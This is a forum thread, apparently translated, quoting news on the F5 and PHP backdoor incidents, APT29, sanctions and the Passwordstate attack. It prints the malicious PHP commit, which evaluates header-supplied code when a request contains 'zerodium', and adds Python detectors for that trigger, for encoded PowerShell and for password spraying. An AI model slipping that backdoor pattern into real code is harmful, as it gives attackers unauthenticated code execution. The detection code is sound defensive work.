Cyber thread: network espionage, tracking of mobile phones and WLANs, hacking, viruses, DoS etc.

ctg

Greatest Leader
Hopefully we have our updates in order.

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.

The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.

Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.

I know from experience how sluggish these updates are in companies.
 

Rauhantekijä

Respected Leader
Supo (the Finnish Security Intelligence Service) suspects an actor linked to China of the Parliament data breach. When the offences under investigation are aggravated espionage, aggravated computer break-in and aggravated violation of the secrecy of communications, everyone understands how serious a matter this is. The discussion is still heading in the direction that Finland will react and respond to this act in some way.


So what do you reckon Finland's rumble towards China will be?
Would it be "come and take the pandas away, we only keep tokens of friendship here"? Or what would it be?

 

Rauhantekijä

Respected Leader
Just take the matter to The Hague and let them decide how to respond.
I don't suppose The Hague is needed here any more than for airspace violations against Finland. We handle it ourselves, in whatever way gets decided.
What would that be?
 

ctg

Greatest Leader
convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
        zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
    } zend_end_try();
}

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.
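The commits quoted above keyed on one thing: the word "zerodium" appearing in a request header. A front-of-stack control that refuses and logs any such request is a cheap compensating detection while a patched build is rolled out. The following is an added example written for this thread, not code from php-src or from the article: only the trigger word comes from the post, while the WSGI middleware, the header handling and the constructed sample requests are assumptions made here.

```python
"""Detection/blocking control at the front of a web stack for the trigger the
backdoored PHP commits keyed on: the word "zerodium" in a request header.
Added example, not code from php-src; the trigger word comes from the post,
the middleware, header handling and sample requests are constructed here."""
import logging
from wsgiref.util import setup_testing_defaults

TRIGGER = "zerodium"   # matched case-sensitively, as strstr() in the quoted commit would
log = logging.getLogger("backdoor-trigger")


def _header_name(environ_key):
    """Turn a WSGI environ key such as HTTP_USER_AGENT back into User-Agent."""
    name = environ_key[5:] if environ_key.startswith("HTTP_") else environ_key
    return name.replace("_", "-").title()


def find_trigger_headers(environ, trigger=TRIGGER):
    """Return [(header-name, value)] for every request header whose value contains `trigger`.
    WSGI exposes request headers as HTTP_<NAME>; Content-Type and Content-Length are the
    two that arrive without the HTTP_ prefix, so they are checked explicitly."""
    hits = []
    for key, value in environ.items():
        if not (key.startswith("HTTP_") or key in ("CONTENT_TYPE", "CONTENT_LENGTH")):
            continue
        if isinstance(value, str) and trigger in value:
            hits.append((_header_name(key), value))
    return sorted(hits)


class TriggerHeaderFilter:
    """Wrap a WSGI application; log and answer 400 when any header carries the trigger."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        hits = find_trigger_headers(environ)
        if hits:
            log.warning("rejected request from %s: trigger in header(s) %s",
                        environ.get("REMOTE_ADDR", "?"),
                        ", ".join(name for name, _ in hits))
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"request rejected\n"]
        return self.app(environ, start_response)


def _hello_app(environ, start_response):
    """Stand-in for the real application behind the filter."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello\n"]


def run_request(app, headers):
    """Drive `app` with a constructed request carrying `headers`; return (status, body)."""
    environ = {}
    setup_testing_defaults(environ)          # fills in a minimal, valid WSGI environ
    for name, value in headers.items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body.decode()


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    app = TriggerHeaderFilter(_hello_app)
    print(run_request(app, {"User-Agent": "Mozilla/5.0"}))      # ('200 OK', 'hello\n')
    print(run_request(app, {"X-Test": "has zerodium in it"}))   # ('400 Bad Request', 'request rejected\n')
```

The match is deliberately case-sensitive because the quoted commit used strstr(), so a broader match would only add false positives; the logged header names give the responder something to pivot on in the access logs.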
 

ctg

Greatest Leader
@Rauhantekijä

Can nation-states defend themselves from hackers and one another?

Steven Cherry Yeah, I mean, this militarization can involve actual counterattacks, right? I mean, in Trickbot there was one. Microsoft went to the courts to be allowed to conduct a counterattack on the malware. And it’s as if the courts are there to reassure us that Microsoft is one of the good guys and its enemies are the bad guys and it’s okay for Microsoft to strike back. Does that sound right? And in your opinion, are the courts up to serving in that role?

Justin Cappos I think this is a very difficult question. There are judges that know quite a bit about security. If I think you took the average judge in the average court, I think they’re absolutely not prepared for this. I certainly wouldn’t want to try to speak for all judges because I have seen some very well reasoned things come out of individual judges here and there who really do seem to understand the technologies and things involved that at a reasonable level to make that judgment.

I do feel overall that going in launching counterattacks is a very, very problematic way of dealing with things because there tends to be collateral damage and there tends to be other types of problems from launching counterattacks. In some ways, it’s a little bit like bringing in an outside species to try to control the problem you have with some other pests where time and time again humans have tried. Oh, we’re going to just we’re going to bring in the cane toads to eat these flies that are plaguing our sugar cane plants or we’re going to bring in this, or we’re going to do that. It just has a way of escalating and getting out of control and causing more damage than perhaps it should. So in general, I think that there are often other ways you can go about this, sort of depending on how you need to strike back and where. But I think that in general, launching retaliatory cyber attacks is a bad idea.

 

ctg

Greatest Leader
@Rauhantekijä

The US Treasury Department, meanwhile, imposed sanctions to retaliate for what it said were “aggressive and harmful activities by the Government of the Russian Federation.” The measures include new prohibitions on Russian sovereign debt and sanctions on six Russia-based firms that the Treasury Department said “supported the Russian Intelligence Services’ efforts to carry out malicious cyber activities against the United States.”

The firms are:
  • ERA Technopolis, a research center operated by the Russian Ministry of Defense for transferring the personnel and expertise of the Russian technology sector to the development of technologies used by the country’s military. ERA Technopolis supports Russia’s Main Intelligence Directorate (GRU), a body responsible for offensive cyber and information operations.
  • Pasit, a Russia-based information technology company that has conducted research and development supporting malicious cyber operations by the SVR.
  • SVA, a Russian state-owned research institute specializing in advanced systems for information security located in that country. SVA has done research and development in support of the SVR’s malicious cyber operations.
  • Neobit, a Saint Petersburg, Russia-based IT security firm whose clients include the Russian Ministry of Defense, SVR, and Russia’s Federal Security Service. Neobit conducted research and development in support of the cyber operations conducted by the FSB, GRU, and SVR.
  • AST, a Russian IT security firm whose clients include the Russian Ministry of Defense, SVR, and FSB. AST provided technical support to cyber operations conducted by the FSB, GRU, and SVR.
  • Positive Technologies, a Russian IT security firm that supports Russian Government clients, including the FSB. Positive Technologies provides computer network security solutions to Russian businesses, foreign governments, and international companies and hosts recruiting events for the FSB and GRU.
“The reason they were called out is because they’re an integral part and participant in the operation that the SVR executes,” Joyce said of the six companies. “Our hope is that by denying the SVR the support of those companies, we’re impacting their ability to project some of this malicious activity around the world and especially into the US.”
 

ctg

Greatest Leader
Widely deployed platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware are all in the crosshairs of APT29, bent on stealing credentials and more.
The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.
According to the U.S. National Security Agency (NSA), which issued an alert Thursday, the advanced persistent threat (APT) group known as APT29 (a.k.a. Cozy Bear or The Dukes) is conducting “widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.”
The targets include U.S. and allied national-security and government networks, it added.
 

ctg

Greatest Leader
As many as 29,000 users of the Passwordstate password manager downloaded a malicious update that extracted data from the app and sent it to an attacker-controlled server, the app-maker told customers.

In an email, Passwordstate creator Click Studios told customers that bad actors compromised its upgrade mechanism and used it to install a malicious file on user computers. The file, named “moserware.secretsplitter.dll,” contained a legitimate copy of an app called SecretSplitter, along with malicious code named "Loader," according to a brief writeup from security firm CSIS Group.
 

ctg

Greatest Leader
Following attribution of the SolarWinds supply chain attack to Russia's APT29, the US CISA infosec agency has published a list of the spies' known tactics – including a penchant for using a naughtily named email provider.

APT29* is the Western infosec world's codename for what we now know is the Russian Foreign Intelligence Service, known by its Russian acronym SVR.

As well as publishing a list of things US counterintelligence know about their Russian offensive counterparts, CISA has also added some advice on how to avoid these common Russian intelligence compromise tactics.

SVR's break-in pros use techniques including "low and slow" password spraying targeted at known admin accounts, zero-days deployed against VPN appliances, and then deploying droppers such as WellMess.

The FBI's initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Detecting the SVR consisted of fairly routine stuff, according to CISA: auditing log files "to identify attempts to access privileged certificates", monitoring networks for encoded PowerShell commands, behavioural profiling of accounts to detect unusual activity indicating a compromise, and using threat intel to keep an eye on "credential abuse within cloud environments."

One giveaway that you might have a Russian spy poking about, warned CISA, is the use of a cock[.]li email address. Though we're fairly sure it wasn't a Russian spy who called us abusive names from a cock[.]li email address in 2016, CISA reckons: "While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains."

We have asked cock[.]li's maintainer, Vincent Canfield, by email for his thoughts on being named by the US government as a harbourer of hostile foreign spies, and will reproduce any printable ones if he replies.
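Two of the detections the post attributes to CISA, monitoring for encoded PowerShell commands and spotting "low and slow" password spraying against admin accounts, are easy to show against log data. The block below is an added example written for this thread, not code from CISA, the FBI or The Register: the log format, the addresses, host names and account names are all constructed, and the harmless encoded command is built in the block itself.

```python
"""Two of the detections CISA lists, run over constructed log lines:
(1) encoded PowerShell command lines, decoded so an analyst can read what ran, and
(2) "low and slow" password spraying: one source, many accounts, very few tries each.
Added example; the log format and every address, host and account name are constructed."""
import base64
import binascii
import re
from collections import defaultdict

# --- Constructed sample data ---------------------------------------------------
# A harmless command encoded the way -EncodedCommand expects: UTF-16LE, then base64.
_ENC = base64.b64encode("Get-Date".encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    "2021-04-15T10:00:01 host=ws01 proc=powershell.exe cmd='powershell.exe -NoP -W Hidden -enc " + _ENC + "'",
    "2021-04-15T10:00:02 host=ws02 proc=cmd.exe cmd='cmd.exe /c dir'",
] + [
    # one address, twelve admin accounts, a single failure each, spread over an hour
    f"2021-04-15T11:{minute:02d}:00 src=203.0.113.9 event=LOGIN_FAIL user=admin{n:02d}"
    for n, minute in enumerate(range(0, 60, 5))
] + [
    # a user mistyping their own password three times from their own workstation
    f"2021-04-15T11:30:{sec:02d} src=10.0.0.7 event=LOGIN_FAIL user=alice" for sec in (10, 20, 30)
]

# --- (1) encoded PowerShell ------------------------------------------------------
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the argument is base64 of UTF-16LE text.
_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_powershell(line):
    """Return the decoded command if `line` carries an encoded-command argument, else None."""
    match = _ENC_RE.search(line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_encoded_powershell(lines):
    """Return [(line, decoded command)] for every line that carries an encoded command."""
    hits = []
    for line in lines:
        decoded = decode_encoded_powershell(line)
        if decoded is not None:
            hits.append((line, decoded))
    return hits

# --- (2) password spraying ------------------------------------------------------
_FAIL_RE = re.compile(r"^\S+ src=(\S+) event=LOGIN_FAIL user=(\S+)")


def find_password_spraying(lines, min_accounts=10, max_per_account=2):
    """Return {source: sorted accounts} for sources whose failures spread across at least
    `min_accounts` distinct accounts with no more than `max_per_account` tries on any one.
    A user who fumbles their own password has one account with many failures, so is not flagged."""
    failures = defaultdict(lambda: defaultdict(int))
    for line in lines:
        match = _FAIL_RE.match(line)
        if match:
            src, user = match.groups()
            failures[src][user] += 1
    return {
        src: sorted(users)
        for src, users in failures.items()
        if len(users) >= min_accounts and max(users.values()) <= max_per_account
    }


if __name__ == "__main__":
    for line, cmd in find_encoded_powershell(SAMPLE_LOGS):
        print("encoded PowerShell:", cmd, "<-", line)
    for src, accounts in find_password_spraying(SAMPLE_LOGS).items():
        print(f"possible password spraying from {src}: {len(accounts)} accounts, e.g. {accounts[:3]}")
```

The spray check keys on the shape of the failures rather than their volume, which is what makes it catch the "low and slow" variant the post describes: a per-account lockout threshold never trips when each account sees one attempt, but a single source touching a dozen admin accounts still stands out.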
 